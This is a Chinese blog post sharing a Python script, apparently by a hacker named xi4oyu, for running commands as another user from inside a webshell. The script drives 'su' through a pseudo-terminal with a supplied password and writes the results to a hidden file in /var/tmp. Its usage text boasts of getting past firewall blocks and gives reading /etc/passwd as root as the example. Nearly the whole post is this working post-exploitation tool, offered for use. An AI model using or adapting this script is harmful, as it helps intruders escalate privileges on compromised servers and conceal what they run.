一个知道帐户名密码在Webshell下执行命令的脚本

# 鬼仔:xi4oyu最近搞了一个站,这个是他新站开张放出来的。

作者:xi4oyu

新站开张,放出来吧。以前是应包总之约写的。前后也没给 过几个人,算是个伪私有版。

#!/usr/bin/env python
#For God sake, Keep it priv4t3

import sys,os,time,pty
def usage():
    print "ptyexec.py: fuck the firewall block up"
    print "By xi4oyu http://www.pentestday.com"
    print "Usage: ptyexec.py <username> <passwd> <command>"
    print 'Ext: ptyexec.py root 123456 "cat /etc/passwd"'
    print 'Result will be located in /var/tmp'
    sys.exit(0)

def fuck_child(pipein):
    os.dup2(pipein,0)
    fd = open("/var/tmp/.result.txt","a")
    os.dup2(fd.fileno(),1)
    os.dup2(fd.fileno(),2)
    pty.spawn("/bin/sh")

    print "GAGA..I'm back,Alt it never be happened"
    sys.exit(0)

def fuck_it_up(user,passwd,command):
    pipein,pipeout = os.pipe()
    #Fork the fucking child
    if os.fork() == 0:
        fuck_child(pipein)
    else:
        time.sleep(2)
        os.write(pipeout,'su - %s\n'% user)
        time.sleep(2)
        os.write(pipeout,'%s\n' % passwd)
        time.sleep(2)
        os.write(pipeout,'%s\n' % command)
        time.sleep(2)
        os.write(pipeout,'exit\n');
        time.sleep(2)
        sys.exit(0)

if __name__ == "__main__":
    if len(sys.argv) != 4:
        usage()
    fuck_it_up(sys.argv[1],sys.argv[2],sys.argv[3])

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

发表评论